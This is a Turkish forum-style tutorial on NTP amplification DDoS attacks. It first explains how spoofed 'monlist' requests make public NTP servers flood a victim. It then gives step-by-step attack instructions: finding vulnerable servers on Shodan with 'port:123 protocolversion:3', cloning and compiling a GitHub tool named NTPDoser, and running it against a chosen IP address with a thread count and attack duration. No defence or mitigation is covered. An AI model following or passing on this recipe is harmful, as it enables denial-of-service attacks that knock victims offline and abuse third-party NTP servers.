NTP Amplification Attack Nedir ?
NTP amplifikasyonu, saldırganın hedeflenen Kullanıcı Datagram Protokolü (UDP) trafiğini aşmak için genel olarak erişilebilir Ağ Zaman Protokolü (NTP) sunucularından yararlandığı bir tür Dağıtılmış Hizmet Reddi ( DDoS ) saldırısıdır.
NTP hizmeti, yöneticilerin sunucuyu bağlı istemcilerin trafik sayıları için sorgulamasına izin veren bir izleme hizmetini destekler. Bu bilgi “monlist” komutu ile sağlanır. Temel saldırı tekniği, savunmasız bir NTP sunucusuna "get monlist" isteği gönderen bir saldırgandan oluşur ve kaynak adresi kurbanın adresi olarak taklit edilir.
NTP Amplification saldırısı, genellikle bir saldırganın birden çok botnet kullanmasıyla gerçekleştirilir. Saldırının gerçekleştirilmesi için hedef sistemin IP adresi yeterlidir. Saldırgan, public NTP sunucularına yapmak isteği küçük boyutlu zararlı isteğin kaynak IP adresi alanına, hedef sistemin IP adresini atamaktadır. Botnetler aracılığıyla, NTP sunucularına yapılan kısa boyutlu zararlı istek (örneğin MON_GETLIST), NTP sunucularının hedef sistemin IP adresine yanıt göndermesine neden olmaktadır. Gönderilen her yanıtın içerisinde ise sunucuya bağlanan son 600 ip adresinin bilgisi olacaktır.
Örnek NTP Amplification Saldırısı
1. Adım / Shodan'a Giriyoruz. Üye olmamız gerekmekte. Yoksa arama bölümünü kullanmazsınız.
2. Adım / Shodan bölümünde port:123 protocolversion:3” komutu kullanılarak, 123 numaralı port üzerinde ve protokol sürümü 3 olan sunucuları listeyeceğiz.Bize 7.143.414 Tane Sunucu listeledi.
3. Adım / Aşağıda vermiş olduğum NTPDoser aracını indiriniz.
Kod:
https://github.com/DrizzleRisk/NTPDoser.git
4. Adım / NTPDoser dizinini seçerek aşağıda vermiş olduğum komutu giriniz. Böylelikle ile NTPDoser.cpp dosyası derlenerek NTPDoser çalıştırılabilir dosyası oluşturulur.
Kod:
[COLOR="Cyan"]gcc NTPDoser.cpp -o NTPDoser -lstdc++ -pthread[/COLOR]
Aşağıdaki gibi bir görüntü ile karşılaşacaksınız. C++ kaynak kodu derlenmektedir.
5. Adım / " ./NTPDoser" komutu ile çalıştırınız.
6. Adım / Son olarak "./NTPDoser "ip adresi" "thread_sayısı" "saldırı süresi" şeklinde çalıştırarak NTP Amplification saldırınızı başlatabilirsiniz.
Son düzenleme: